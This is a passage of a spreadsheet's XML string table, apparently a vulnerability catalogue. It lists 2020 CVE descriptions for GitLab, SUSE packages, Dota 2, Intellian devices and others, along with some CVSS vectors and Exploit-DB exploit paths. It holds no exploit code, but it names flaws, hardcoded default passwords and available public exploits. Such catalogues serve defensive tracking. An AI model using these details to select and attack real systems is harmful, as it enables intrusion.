    <t>Local registry credentials were included directly in the CD4PE deployment definition, which could expose these credentials to users who should not have access to them. This is resolved in Continuous Delivery for Puppet Enterprise 4.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-7947</t>
  </si>
  <si>
    <t>An issue was discovered in the Login by Auth0 plugin before 4.0.0 for WordPress. It has numerous fields that can contain data that is pulled from different sources. One issue with this is that the data isn't sanitized, and no input validation is performed, before the exporting of the user data. This can lead to (at least) CSV injection if a crafted Excel document is uploaded.</t>
  </si>
  <si>
    <t>CVE-2020-7948</t>
  </si>
  <si>
    <t>An issue was discovered in the Login by Auth0 plugin before 4.0.0 for WordPress. A user can perform an insecure direct object reference.</t>
  </si>
  <si>
    <t>CVE-2020-7949</t>
  </si>
  <si>
    <t>schemasystem.dll in Valve Dota 2 before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a GetValue call.</t>
  </si>
  <si>
    <t>exploits/windows/dos/48031.txt</t>
  </si>
  <si>
    <t>Dota 2 7.23f - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>CVE-2020-7950</t>
  </si>
  <si>
    <t>meshsystem.dll in Valve Dota 2 before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a vulnerable function call.</t>
  </si>
  <si>
    <t>CVE-2020-7951</t>
  </si>
  <si>
    <t>meshsystem.dll in Valve Dota 2 before 7.23e allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is affected by memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-7952</t>
  </si>
  <si>
    <t>rendersystemdx9.dll in Valve Dota 2 before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is affected by memory corruption.</t>
  </si>
  <si>
    <t>CVE-2020-7953</t>
  </si>
  <si>
    <t>An issue was discovered in OpServices OpMon 9.3.2. Without authentication, it is possible to read server files (e.g., /etc/passwd) due to the use of the nmap -iL (aka input file) option.</t>
  </si>
  <si>
    <t>CVE-2020-7954</t>
  </si>
  <si>
    <t>An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs (e.g. nmap) without the need for a password with sudo.</t>
  </si>
  <si>
    <t>CVE-2020-7955</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise 1.4.1 through 1.6.2 did not uniformly enforce ACLs across all API endpoints, resulting in potential unintended information disclosure. Fixed in 1.6.3.</t>
  </si>
  <si>
    <t>CVE-2020-7956</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nomad Enterprise up to 0.10.2 incorrectly validated role/region associated with TLS certificates used for mTLS RPC, and were susceptible to privilege escalation. Fixed in 0.10.3.</t>
  </si>
  <si>
    <t>CVE-2020-7957</t>
  </si>
  <si>
    <t>The IMAP and LMTP components in Dovecot 2.3.9 before 2.3.9.3 mishandle snippet generation when many characters must be read to compute the snippet and a trailing &gt; character exists. This causes a denial of service in which the recipient cannot read all of their messages.</t>
  </si>
  <si>
    <t>CVE-2020-7958</t>
  </si>
  <si>
    <t>An issue was discovered on OnePlus 7 Pro devices before 10.0.3.GM21BA. The firmware was found to contain functionality that allows a privileged user (root) in the Rich Execution Environment (REE) to obtain bitmap images from the fingerprint sensor because of Leftover Debug Code. The issue is that the Trusted Application (TA) supports an extended number of commands beyond what is needed to implement a fingerprint authentication system compatible with Android. An attacker who is in the position to send commands to the TA (for example, the root user) is able to send a sequence of these commands that will result in the TA sending a raw fingerprint image to the REE. This means that the Trusted Execution Environment (TEE) no longer protects identifiable fingerprint data from the REE.</t>
  </si>
  <si>
    <t>CVE-2020-7959</t>
  </si>
  <si>
    <t>LabVantage LIMS 8.3 does not properly maintain the confidentiality of database names. For example, the web application exposes the database name. An attacker might be able to enumerate database names by providing his own database name in a request, because the response will return an 'Unrecognized Database exception message if the database does not exist.</t>
  </si>
  <si>
    <t>CVE-2020-7961</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).</t>
  </si>
  <si>
    <t>exploits/java/remote/48332.msf</t>
  </si>
  <si>
    <t>Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-7962</t>
  </si>
  <si>
    <t>An issue was discovered in One Identity Password Manager 5.8. An attacker could enumerate valid answers for a user. It is possible for an attacker to detect a valid answer based on the HTTP response content, and reuse this answer later for a password reset on a chosen password. The enumeration is possible because, within the HTTP response content, WRONG ID is only returned when the answer is incorrect.</t>
  </si>
  <si>
    <t>CVE-2020-7964</t>
  </si>
  <si>
    <t>An issue was discovered in Mirumee Saleor 2.x before 2.9.1. Incorrect access control in the checkoutCustomerAttach mutations allows attackers to attach their checkouts to any user ID and consequently leak user data (e.g., name, address, and previous orders of any other customer).</t>
  </si>
  <si>
    <t>CVE-2020-7965</t>
  </si>
  <si>
    <t>flaskparser.py in Webargs 5.x through 5.5.2 doesn't check that the Content-Type header is application/json when receiving JSON input. If the request body is valid JSON, it will accept it even if the content type is application/x-www-form-urlencoded. This allows for JSON POST requests to be made across domains, leading to CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-7966</t>
  </si>
  <si>
    <t>GitLab EE 11.11 and later through 12.7.2 allows Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-7967</t>
  </si>
  <si>
    <t>GitLab EE 8.0 through 12.7.2 has Insecure Permissions (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-7968</t>
  </si>
  <si>
    <t>GitLab EE 8.0 through 12.7.2 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-7969</t>
  </si>
  <si>
    <t>GitLab EE 8.0 and later through 12.7.2 allows Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-7971</t>
  </si>
  <si>
    <t>GitLab EE 11.0 and later through 12.7.2 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-7972</t>
  </si>
  <si>
    <t>GitLab EE 12.2 has Insecure Permissions (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-7973</t>
  </si>
  <si>
    <t>GitLab through 12.7.2 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-7974</t>
  </si>
  <si>
    <t>GitLab EE 10.1 through 12.7.2 allows Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-7976</t>
  </si>
  <si>
    <t>GitLab EE 12.4 and later through 12.7.2 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-7977</t>
  </si>
  <si>
    <t>GitLab EE 8.8 and later through 12.7.2 has Insecure Permissions.</t>
  </si>
  <si>
    <t>CVE-2020-7978</t>
  </si>
  <si>
    <t>GitLab EE 12.6 and later through 12.7.2 allows Denial of Service.</t>
  </si>
  <si>
    <t>CVE-2020-7979</t>
  </si>
  <si>
    <t>GitLab EE 8.9 and later through 12.7.2 has Insecure Permission</t>
  </si>
  <si>
    <t>CVE-2020-7980</t>
  </si>
  <si>
    <t>Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/47976.py</t>
  </si>
  <si>
    <t>Satellian 1.12 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-7981</t>
  </si>
  <si>
    <t>sql.rb in Geocoder before 1.6.1 allows Boolean-based SQL injection when within_bounding_box is used in conjunction with untrusted sw_lat, sw_lng, ne_lat, or ne_lng data.</t>
  </si>
  <si>
    <t>CVE-2020-7982</t>
  </si>
  <si>
    <t>An issue was discovered in OpenWrt 18.06.0 to 18.06.6 and 19.07.0, and LEDE 17.01.0 to 17.01.7. A bug in the fork of the opkg package manager before 2020-01-25 prevents correct parsing of embedded checksums in the signed repository index, allowing a man-in-the-middle attacker to inject arbitrary package payloads (which are installed without verification).</t>
  </si>
  <si>
    <t>CVE-2020-7983</t>
  </si>
  <si>
    <t>A CSRF issue in login.asp on Ruckus R500 3.4.2.0.384 devices allows remote attackers to access the panel or conduct SSRF attacks.</t>
  </si>
  <si>
    <t>CVE-2020-7984</t>
  </si>
  <si>
    <t>SolarWinds N-central before 12.1 SP1 HF5 and 12.2 before SP1 HF2 allows remote attackers to retrieve cleartext domain admin credentials from the Agent &amp; Probe settings, and obtain other sensitive information. The attacker can use a customer ID to self register and read any aspects of the agent/appliance configuration.</t>
  </si>
  <si>
    <t>CVE-2020-7988</t>
  </si>
  <si>
    <t>An issue was discovered in tools/pass-change/result.php in phpIPAM 1.4. CSRF can be used to change the password of any user/admin, to escalate privileges, and to gain access to more data and functionality. This issue exists due to the lack of a requirement to provide the old password, and the lack of security tokens.</t>
  </si>
  <si>
    <t>CVE-2020-7989</t>
  </si>
  <si>
    <t>Adive Framework 2.0.8 has admin/user/add userUsername XSS.</t>
  </si>
  <si>
    <t>CVE-2020-7990</t>
  </si>
  <si>
    <t>Adive Framework 2.0.8 has admin/user/add userName XSS.</t>
  </si>
  <si>
    <t>CVE-2020-7991</t>
  </si>
  <si>
    <t>Adive Framework 2.0.8 has admin/config CSRF to change the Administrator password.</t>
  </si>
  <si>
    <t>exploits/php/webapps/47966.txt</t>
  </si>
  <si>
    <t>Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)</t>
  </si>
  <si>
    <t>CVE-2020-7993</t>
  </si>
  <si>
    <t>Prototype 1.6.0.1 allows remote authenticated users to forge ticket creation (on behalf of other user accounts) via a modified email ID field.</t>
  </si>
  <si>
    <t>CVE-2020-7994</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 10.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) label[libelle] parameter to the /htdocs/admin/dict.php?id=3 page; the (2) name[constname] parameter to the /htdocs/admin/const.php?mainmenu=home page; the (3) note[note] parameter to the /htdocs/admin/dict.php?id=10 page; the (4) zip[MAIN_INFO_SOCIETE_ZIP] or email[mail] parameter to the /htdocs/admin/company.php page; the (5) url[defaulturl], field[defaultkey], or value[defaultvalue] parameter to the /htdocs/admin/defaultvalues.php page; the (6) key[transkey] or key[transvalue] parameter to the /htdocs/admin/translation.php page; or the (7) [main_motd] or [main_home] parameter to the /htdocs/admin/ihm.php page.</t>
  </si>
  <si>
    <t>CVE-2020-7995</t>
  </si>
  <si>
    <t>The htdocs/index.php?mainmenu=home login page in Dolibarr 10.0.6 allows an unlimited rate of failed authentication attempts.</t>
  </si>
  <si>
    <t>CVE-2020-7996</t>
  </si>
  <si>
    <t>htdocs/user/passwordforgotten.php in Dolibarr 10.0.6 allows XSS via the Referer HTTP header.</t>
  </si>
  <si>
    <t>CVE-2020-7997</t>
  </si>
  <si>
    <t>ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature.</t>
  </si>
  <si>
    <t>CVE-2020-7998</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability has been discovered in the Super File Explorer app 1.0.1 for iOS. The vulnerability is located in the developer path that is accessible and hidden next to the root path. By default, there is no password set for the FTP or Web UI service.</t>
  </si>
  <si>
    <t>CVE-2020-7999</t>
  </si>
  <si>
    <t>The Intellian Aptus application 1.0.2 for Android has hardcoded values for DOWNLOAD_API_KEY and FILE_DOWNLOAD_API_KEY.</t>
  </si>
  <si>
    <t>CVE-2020-8000</t>
  </si>
  <si>
    <t>Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.</t>
  </si>
  <si>
    <t>CVE-2020-8001</t>
  </si>
  <si>
    <t>The Intellian Aptus application 1.0.2 for Android has a hardcoded password of intellian for the masteruser FTP account.</t>
  </si>
  <si>
    <t>CVE-2020-8002</t>
  </si>
  <si>
    <t>A NULL pointer dereference in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service via commands that attempt to launch a grid without previously providing a Compute Shader (CS).</t>
  </si>
  <si>
    <t>CVE-2020-8003</t>
  </si>
  <si>
    <t>A double-free vulnerability in vrend_renderer.c in virglrenderer through 0.8.1 allows attackers to cause a denial of service by triggering texture allocation failure, because vrend_renderer_resource_allocated_texture is not an appropriate place for a free.</t>
  </si>
  <si>
    <t>CVE-2020-8004</t>
  </si>
  <si>
    <t>STMicroelectronics STM32F1 devices have Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-8009</t>
  </si>
  <si>
    <t>AVB MOTU devices through 2020-01-22 allow /.. Directory Traversal, as demonstrated by reading the /etc/passwd file.</t>
  </si>
  <si>
    <t>CVE-2020-8010</t>
  </si>
  <si>
    <t>CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains an improper ACL handling vulnerability in the robot (controller) component. A remote attacker can execute commands, read from, or write to the target system.</t>
  </si>
  <si>
    <t>CVE-2020-8011</t>
  </si>
  <si>
    <t>CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains a null pointer dereference vulnerability in the robot (controller) component. A remote attacker can crash the Controller service.</t>
  </si>
  <si>
    <t>CVE-2020-8012</t>
  </si>
  <si>
    <t>CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains a buffer overflow vulnerability in the robot (controller) component. A remote attacker can execute arbitrary code.</t>
  </si>
  <si>
    <t>exploits/windows/remote/48156.c</t>
  </si>
  <si>
    <t>CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow</t>
  </si>
  <si>
    <t>CVE-2020-8013</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in chkstat of SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Server 15, SUSE Linux Enterprise Server 11 set permissions intended for specific binaries on other binaries because it erroneously followed symlinks. The symlinks can't be controlled by attackers on default systems, so exploitation is difficult. This issue affects: SUSE Linux Enterprise Server 12 permissions versions prior to 2015.09.28.1626-17.27.1. SUSE Linux Enterprise Server 15 permissions versions prior to 20181116-9.23.1. SUSE Linux Enterprise Server 11 permissions versions prior to 2013.1.7-0.6.12.1.</t>
  </si>
  <si>
    <t>CVE-2020-8014</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in the packaging of kopano-spamd of openSUSE Leap 15.1, openSUSE Tumbleweed allowed local attackers with the privileges of the kopano user to escalate to root. This issue affects: openSUSE Leap 15.1 kopano-spamd versions prior to 10.0.5-lp151.4.1. openSUSE Tumbleweed kopano-spamd versions prior to 10.0.5-1.1.</t>
  </si>
  <si>
    <t>CVE-2020-8015</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in the packaging of exim in openSUSE Factory allows local attackers to escalate from user mail to root. This issue affects: openSUSE Factory exim versions prior to 4.93.0.4-3.1.</t>
  </si>
  <si>
    <t>CVE-2020-8016</t>
  </si>
  <si>
    <t>A Race Condition Enabling Link Following vulnerability in the packaging of texlive-filesystem of SUSE Linux Enterprise Module for Desktop Applications 15-SP1, SUSE Linux Enterprise Software Development Kit 12-SP4, SUSE Linux Enterprise Software Development Kit 12-SP5; openSUSE Leap 15.1 allows local users to corrupt files or potentially escalate privileges. This issue affects: SUSE Linux Enterprise Module for Desktop Applications 15-SP1 texlive-filesystem versions prior to 2017.135-9.5.1. SUSE Linux Enterprise Software Development Kit 12-SP4 texlive-filesystem versions prior to 2013.74-16.5.1. SUSE Linux Enterprise Software Development Kit 12-SP5 texlive-filesystem versions prior to 2013.74-16.5.1. openSUSE Leap 15.1 texlive-filesystem versions prior to 2017.135-lp151.8.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-8017</t>
  </si>
  <si>
    <t>A Race Condition Enabling Link Following vulnerability in the cron job shipped with texlive-filesystem of SUSE Linux Enterprise Module for Desktop Applications 15-SP1, SUSE Linux Enterprise Software Development Kit 12-SP4, SUSE Linux Enterprise Software Development Kit 12-SP5; openSUSE Leap 15.1 allows local users in group mktex to delete arbitrary files on the system This issue affects: SUSE Linux Enterprise Module for Desktop Applications 15-SP1 texlive-filesystem versions prior to 2017.135-9.5.1. SUSE Linux Enterprise Software Development Kit 12-SP4 texlive-filesystem versions prior to 2013.74-16.5.1. SUSE Linux Enterprise Software Development Kit 12-SP5 texlive-filesystem versions prior to 2013.74-16.5.1. openSUSE Leap 15.1 texlive-filesystem versions prior to 2017.135-lp151.8.3.1.</t>
  </si>
  <si>
    <t>CVE-2020-8018</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the SLES15-SP1-CHOST-BYOS and SLES15-SP1-CAP-Deployment-BYOS images of SUSE Linux Enterprise Server 15 SP1 allows local attackers with the UID 1000 to escalate to root due to a /etc directory owned by the user This issue affects: SUSE Linux Enterprise Server 15 SP1 SLES15-SP1-CAP-Deployment-BYOS version 1.0.1 and prior versions; SLES15-SP1-CHOST-BYOS versions prior to 1.0.3 and prior versions;</t>
  </si>
  <si>
    <t>CVE-2020-8019</t>
  </si>
  <si>
    <t>A UNIX Symbolic Link (Symlink) Following vulnerability in the packaging of syslog-ng of SUSE Linux Enterprise Debuginfo 11-SP3, SUSE Linux Enterprise Debuginfo 11-SP4, SUSE Linux Enterprise Module for Legacy Software 12, SUSE Linux Enterprise Point of Sale 11-SP3, SUSE Linux Enterprise Server 11-SP4-LTSS, SUSE Linux Enterprise Server for SAP 12-SP1; openSUSE Backports SLE-15-SP1, openSUSE Leap 15.1 allowed local attackers controlling the user news to escalate their privileges to root. This issue affects: SUSE Linux Enterprise Debuginfo 11-SP3 syslog-ng versions prior to 2.0.9-27.34.40.5.1. SUSE Linux Enterprise Debuginfo 11-SP4 syslog-ng versions prior to 2.0.9-27.34.40.5.1. SUSE Linux Enterprise Module for Legacy Software 12 syslog-ng versions prior to 3.6.4-12.8.1. SUSE Linux Enterprise Point of Sale 11-SP3 syslog-ng versions prior to 2.0.9-27.34.40.5.1. SUSE Linux Enterprise Server 11-SP4-LTSS syslog-ng versions prior to 2.0.9-27.34.40.5.1. SUSE Linux Enterprise Server for SAP 12-SP1 syslog-ng versions prior to 3.6.4-12.8.1. openSUSE Backports SLE-15-SP1 syslog-ng versions prior to 3.19.1-bp151.4.6.1. openSUSE Leap 15.1 syslog-ng versions prior to 3.19.1-lp151.3.6.1.</t>
  </si>
  <si>
    <t>CVE-2020-8020</t>
  </si>
  <si>
    <t>A Improper Neutralization of Input During Web Page Generation vulnerability in open-build-service allows remote attackers to store arbitrary JS code to cause XSS. This issue affects: openSUSE open-build-service versions prior to 7cc32c8e2ff7290698e101d9a80a9dc29a5500fb.</t>
  </si>
  <si>
    <t>CVE-2020-8021</t>
  </si>
  <si>
    <t>a Improper Access Control vulnerability in of Open Build Service allows remote attackers to read files of an OBS package where the sourceaccess/access is disabled This issue affects: Open Build Service versions prior to 2.10.5.</t>
  </si>
  <si>
    <t>CVE-2020-8022</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the packaging of tomcat on SUSE Enterprise Storage 5, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud Crowbar 8 allows local attackers to escalate from group tomcat to root. This issue affects: SUSE Enterprise Storage 5 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP4 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 12-SP5 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 15-LTSS tomcat versions prior to 9.0.35-3.57.3. SUSE Linux Enterprise Server for SAP 12-SP2 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 12-SP3 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 15 tomcat versions prior to 9.0.35-3.57.3. SUSE OpenStack Cloud 7 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud 8 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud Crowbar 8 tomcat versions prior to 8.0.53-29.32.1.</t>
  </si>
  <si>
    <t>CVE-2020-8023</t>
  </si>
  <si>
    <t>A acceptance of Extraneous Untrusted Data With Trusted Data vulnerability in the start script of openldap2 of SUSE Enterprise Storage 5, SUSE Linux Enterprise Debuginfo 11-SP3, SUSE Linux Enterprise Debuginfo 11-SP4, SUSE Linux Enterprise Point of Sale 11-SP3, SUSE Linux Enterprise Server 11-SECURITY, SUSE Linux Enterprise Server 11-SP4-LTSS, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud Crowbar 8; openSUSE Leap 15.1, openSUSE Leap 15.2 allows local attackers to escalate privileges from user ldap to root. This issue affects: SUSE Enterprise Storage 5 openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Debuginfo 11-SP3 openldap2 versions prior to 2.4.26-0.74.13.1,. SUSE Linux Enterprise Debuginfo 11-SP4 openldap2 versions prior to 2.4.26-0.74.13.1,. SUSE Linux Enterprise Point of Sale 11-SP3 openldap2 versions prior to 2.4.26-0.74.13.1,. SUSE Linux Enterprise Server 11-SECURITY openldap2-client-openssl1 versions prior to 2.4.26-0.74.13.1. SUSE Linux Enterprise Server 11-SP4-LTSS openldap2 versions prior to 2.4.26-0.74.13.1,. SUSE Linux Enterprise Server 12-SP2-BCL openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 12-SP2-LTSS openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 12-SP3-BCL openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 12-SP3-LTSS openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 12-SP4 openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 12-SP5 openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server 15-LTSS openldap2 versions prior to 2.4.46-9.31.1. SUSE Linux Enterprise Server for SAP 12-SP2 openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server for SAP 12-SP3 openldap2 versions prior to 2.4.41-18.71.2. SUSE Linux Enterprise Server for SAP 15 openldap2 versions prior to 2.4.46-9.31.1. SUSE OpenStack Cloud 7 openldap2 versions prior to 2.4.41-18.71.2. SUSE OpenStack Cloud 8 openldap2 versions prior to 2.4.41-18.71.2. SUSE OpenStack Cloud Crowbar 8 openldap2 versions prior to 2.4.41-18.71.2. openSUSE Leap 15.1 openldap2 versions prior to 2.4.46-lp151.10.12.1. openSUSE Leap 15.2 openldap2 versions prior to 2.4.46-lp152.14.3.1.</t>
  </si>
  <si>
    <t>349</t>
  </si>
  <si>
    <t>CVE-2020-8024</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the packaging of hylafax+ of openSUSE Leap 15.2, openSUSE Leap 15.1, openSUSE Factory allows local attackers to escalate from user uucp to users calling hylafax binaries. This issue affects: openSUSE Leap 15.2 hylafax+ versions prior to 7.0.2-lp152.2.1. openSUSE Leap 15.1 hylafax+ version 5.6.1-lp151.3.7 and prior versions. openSUSE Factory hylafax+ versions prior to 7.0.2-2.1.</t>
  </si>
  <si>
    <t>CVE-2020-8025</t>
  </si>
  <si>
    <t>A Incorrect Execution-Assigned Permissions vulnerability in the permissions package of SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 15; openSUSE Leap 15.1, openSUSE Tumbleweed sets the permissions for some of the directories of the pcp package to unintended settings. This issue affects: SUSE Linux Enterprise Server 12-SP4 permissions versions prior to 20170707-3.24.1. SUSE Linux Enterprise Server 15-LTSS permissions versions prior to 20180125-3.27.1. SUSE Linux Enterprise Server for SAP 15 permissions versions prior to 20180125-3.27.1. openSUSE Leap 15.1 permissions versions prior to 20181116-lp151.4.24.1. openSUSE Tumbleweed permissions versions prior to 20200624.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</t>
  </si>
  <si>
    <t>279</t>
  </si>
  <si>
    <t>CVE-2020-8026</t>
  </si>
  <si>
    <t>A Incorrect Default Permissions vulnerability in the packaging of inn in openSUSE Leap 15.2, openSUSE Tumbleweed, openSUSE Leap 15.1 allows local attackers with control of the new user to escalate their privileges to root. This issue affects: openSUSE Leap 15.2 inn version 2.6.2-lp152.1.26 and prior versions. openSUSE Tumbleweed inn version 2.6.2-4.2 and prior versions. openSUSE Leap 15.1 inn version 2.5.4-lp151.3.3.1 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-8027</t>
  </si>
  <si>
    <t>A Insecure Temporary File vulnerability in openldap2 of SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 15; openSUSE Leap 15.1, openSUSE Leap 15.2 allows local attackers to overwrite arbitrary files and gain access to the openldap2 configuration This issue affects: SUSE Linux Enterprise Server 15-LTSS openldap2 versions prior to 2.4.46-9.37.1. SUSE Linux Enterprise Server for SAP 15 openldap2 versions prior to 2.4.46-9.37.1. openSUSE Leap 15.1 openldap2 versions prior to 2.4.46-lp151.10.18.1. openSUSE Leap 15.2 openldap2 versions prior to 2.4.46-lp152.14.9.1.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-8028</t>
  </si>
  <si>
    <t>A Improper Access Control vulnerability in the configuration of salt of SUSE Linux Enterprise Module for SUSE Manager Server 4.1, SUSE Manager Proxy 4.0, SUSE Manager Retail Branch Server 4.0, SUSE Manager Server 3.2, SUSE Manager Server 4.0 allows local users to escalate to root on every system managed by SUSE manager. On the managing node itself code can be executed as user salt, potentially allowing for escalation to root there. This issue affects: SUSE Linux Enterprise Module for SUSE Manager Server 4.1 google-gson versions prior to 2.8.5-3.4.3, httpcomponents-client-4.5.6-3.4.2, httpcomponents-. SUSE Manager Proxy 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Retail Branch Server 4.0 release-notes-susemanager-proxy versions prior to 4.0.9-0.16.38.1. SUSE Manager Server 3.2 salt-netapi-client versions prior to 0.16.0-4.14.1, spacewalk-. SUSE Manager Server 4.0 release-notes-susemanager versions prior to 4.0.9-3.54.1.</t>
  </si>
  <si>
    <t>CVE-2020-8029</t>
  </si>
  <si>
    <t>A Incorrect Permission Assignment for Critical Resource vulnerability in skuba of SUSE CaaS Platform 4.5 allows local attackers to gain access to the kublet key. This issue affects: SUSE CaaS Platform 4.5 skuba versions prior to https://github.com/SUSE/skuba/pull/1416.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-8030</t>
  </si>
  <si>
    <t>A Insecure Temporary File vulnerability in skuba of SUSE CaaS Platform 4.5 allows local attackers to leak the bootstrapToken or modify the configuration file before it is processed, leading to arbitrary modifications of the machine/cluster.</t>
  </si>
  <si>
    <t>CVE-2020-8031</t>
  </si>
  <si>
    <t>A Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Open Build Service allows remote attackers to store JS code in markdown that is not properly escaped, impacting confidentiality and integrity. This issue affects: Open Build Service versions prior to 2.10.8.</t>
  </si>
  <si>
    <t>CVE-2020-8032</t>
  </si>
  <si>
    <t>A Insecure Temporary File vulnerability in the packaging of cyrus-sasl of openSUSE Factory allows local attackers to escalate to root. This issue affects: openSUSE Factory cyrus-sasl version 2.1.27-4.2 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-8033</t>
  </si>
  <si>
    <t>Ruckus R500 3.4.2.0.384 devices allow XSS via the index.asp Device Name field.</t>
  </si>
  <si>
    <t>CVE-2020-8034</t>
  </si>
  <si>
    <t>Gollem before 3.0.13, as used in Horde Groupware Webmail Edition 5.2.22 and other products, is affected by a reflected Cross-Site Scripting (XSS) vulnerability via the HTTP GET dir parameter in the browser functionality, affecting breadcrumb output. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL.</t>
  </si>
  <si>
    <t>CVE-2020-8035</t>
  </si>
  <si>
